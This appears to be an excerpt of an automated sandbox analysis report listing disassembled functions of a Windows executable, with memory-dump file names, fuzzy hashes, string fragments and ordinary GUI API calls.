                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: 3cbfb93aa9f489873e884a42e2512b69c7206d4bafc9f51dfe1f778d4849d413
                                                                                                      • Instruction ID: 99111894da1ab240ebf87c30a7a9b824bb225c2fa9d41951a62514674424083e
                                                                                                      • Opcode Fuzzy Hash: 3cbfb93aa9f489873e884a42e2512b69c7206d4bafc9f51dfe1f778d4849d413
                                                                                                      • Instruction Fuzzy Hash: AFA1B471D092A88AF7208724DC447DABBB1EF55304F1480F9D44D67281DB7A5FC58FA6
                                                                                                      Function 00413570 Relevance: 30.2, Strings: 24, Instructions: 240COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: 8cbda77d88b066c5055ea90da5fa892477d726b235dd8f097f2d99a3a69302d2
                                                                                                      • Instruction ID: d83d44a8ab35dc94ef27aa1c5c75c1c9862d275253c9a3264ce84b967e7aed97
                                                                                                      • Opcode Fuzzy Hash: 8cbda77d88b066c5055ea90da5fa892477d726b235dd8f097f2d99a3a69302d2
                                                                                                      • Instruction Fuzzy Hash: 13A1C371D096A88AFB208B24DC447DABBB1EF55304F1480FAD44C67282DB7A5FC58F96
                                                                                                      Function 0041474C Relevance: 30.2, Strings: 24, Instructions: 240COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: 735fd51368ca65d9d74e3c53a092f533395690b7286beb55e297191587e599a4
                                                                                                      • Instruction ID: 0afd262ae99e6be7b7a8438106a8198559f7529a47f58a7203d65598c1fe116c
                                                                                                      • Opcode Fuzzy Hash: 735fd51368ca65d9d74e3c53a092f533395690b7286beb55e297191587e599a4
                                                                                                      • Instruction Fuzzy Hash: 2BB1C271D092A88AFB208B24DC447DABBB1EF55304F1480FAD44C67282DA7A5FC5CF96
                                                                                                      Function 00413132 Relevance: 30.2, Strings: 24, Instructions: 239COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: f50d55136c5ffa970e1dae79f118b15d9ff708402845941efef588acec1ca3fb
                                                                                                      • Instruction ID: c25dd87bad18bc66a0f470bac157d218bac7963712100d645dece4265987d47c
                                                                                                      • Opcode Fuzzy Hash: f50d55136c5ffa970e1dae79f118b15d9ff708402845941efef588acec1ca3fb
                                                                                                      • Instruction Fuzzy Hash: D0A1A471D092A88AF7208B24DC447DABBB1AF55304F1480FAD44D67281DB7A5FC58FA6
                                                                                                      Function 004147EF Relevance: 30.2, Strings: 24, Instructions: 233COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: 90abf1641b7a1a6be9800be7494e404d5dabff27257246a4c76fb0b234db8b7a
                                                                                                      • Instruction ID: edde88aeb429ed555d44e5ea1177d43fb7da7136bf72ad22bba4db04e56a6075
                                                                                                      • Opcode Fuzzy Hash: 90abf1641b7a1a6be9800be7494e404d5dabff27257246a4c76fb0b234db8b7a
                                                                                                      • Instruction Fuzzy Hash: D8A1B171D092A88AFB208B24DC447DABBB1AF55304F0480FAD48D67281DB7A5FC5CF96
                                                                                                      Function 0040D7F1 Relevance: 30.2, Strings: 24, Instructions: 229COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: 79965e970d2ada1c31b29b28a53aa787836406e8735c38d64c9c9d6323ef3eda
                                                                                                      • Instruction ID: 25d94598eccedcaffa679a4641a92698017a3e7cfb8d8af7776525c5384b9530
                                                                                                      • Opcode Fuzzy Hash: 79965e970d2ada1c31b29b28a53aa787836406e8735c38d64c9c9d6323ef3eda
                                                                                                      • Instruction Fuzzy Hash: EEA1C271D082A88AFB218624DC447DABBB1AF55304F1480FAD44D67282DB7E5FC5CFA6
                                                                                                      Function 004180B8 Relevance: 30.2, Strings: 24, Instructions: 228COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: 0cb8d4b0e84dd5d5335058ad563d42cb7a03345a015456a575d4d42dc1d337de
                                                                                                      • Instruction ID: d75e7256137120f3f68b594f42c64c9ea5fbbe783953353aff833faed462d0f0
                                                                                                      • Opcode Fuzzy Hash: 0cb8d4b0e84dd5d5335058ad563d42cb7a03345a015456a575d4d42dc1d337de
                                                                                                      • Instruction Fuzzy Hash: 9FA1C371D096A88AFB208B24CC447DABBB1AF55304F1480F9C44C67281DB7A5FC5CFA6
                                                                                                      Function 0040B770 Relevance: 30.2, Strings: 24, Instructions: 223COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: 0652a38ebb73d5e6154102d70fb4cadac40e9d39f4794a334af78464962486e4
                                                                                                      • Instruction ID: a3866988268939591c99ea6217f655277d4524acd22b780f977da5319c2e8467
                                                                                                      • Opcode Fuzzy Hash: 0652a38ebb73d5e6154102d70fb4cadac40e9d39f4794a334af78464962486e4
                                                                                                      • Instruction Fuzzy Hash: CA91D171D082A88AFB218624DC447DABBB1AF51304F1480FAD44D67282DB7E5FC58FA6
                                                                                                      Function 0042A7F8 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 212windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 0042A7FD
                                                                                                      • FindResourceW.KERNEL32(00000000,?,000000F1,00000000,?,000000CE), ref: 0042A81C
                                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,000000CE), ref: 0042A82E
                                                                                                      • LockResource.KERNEL32(00000000,?,000000CE), ref: 0042A83D
                                                                                                      • CreateWindowExW.USER32(00000000,ToolbarWindow32,00000000,?,00000000,00000000,00000064,00000064,?,?,00000000,00000000), ref: 0042A905
                                                                                                      • SendMessageW.USER32(00000000,0000041E,00000014,00000000), ref: 0042A928
                                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0042A931
                                                                                                      • GetStockObject.GDI32(00000011), ref: 0042A93F
                                                                                                      • GetObjectW.GDI32(?,0000005C,?), ref: 0042A95E
                                                                                                      • ImageList_LoadImageW.COMCTL32(00000000,?,?,00000001,FF000000,00000000,00002040,?,000000CE), ref: 0042A9AA
                                                                                                      • SendMessageW.USER32(?,00000413,?,?), ref: 0042A9DB
                                                                                                      • SendMessageW.USER32(?,00000444,?,?), ref: 0042A9EB
                                                                                                      • SendMessageW.USER32(?,00000420,00000000,?), ref: 0042AA12
                                                                                                      • SendMessageW.USER32(?,0000041F,00000000,?), ref: 0042AA40
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Resource$ImageLoadObject$CreateFindH_prologList_LockStockWindow
                                                                                                      • String ID: ToolbarWindow32
                                                                                                      • API String ID: 1585238749-4104838417
                                                                                                      • Opcode ID: 38e01c4a41705dce5883da80595250465f7af62ddce343f7d7759089226c2095
                                                                                                      • Instruction ID: e4a07cb8a9fa0e387b48a46276dc3d7bcb1ee9585effa425a994969f457fcefd
                                                                                                      • Opcode Fuzzy Hash: 38e01c4a41705dce5883da80595250465f7af62ddce343f7d7759089226c2095
                                                                                                      • Instruction Fuzzy Hash: 2E71E2B1A00265EFDB109F55CC45BAEBBB5FF44700F45845BFA00EB2A1D3B48991CBA9
                                                                                                      Function 00406100 Relevance: 19.1, Strings: 15, Instructions: 358COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: G:D;$P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                                                                                      • API String ID: 0-3258523607
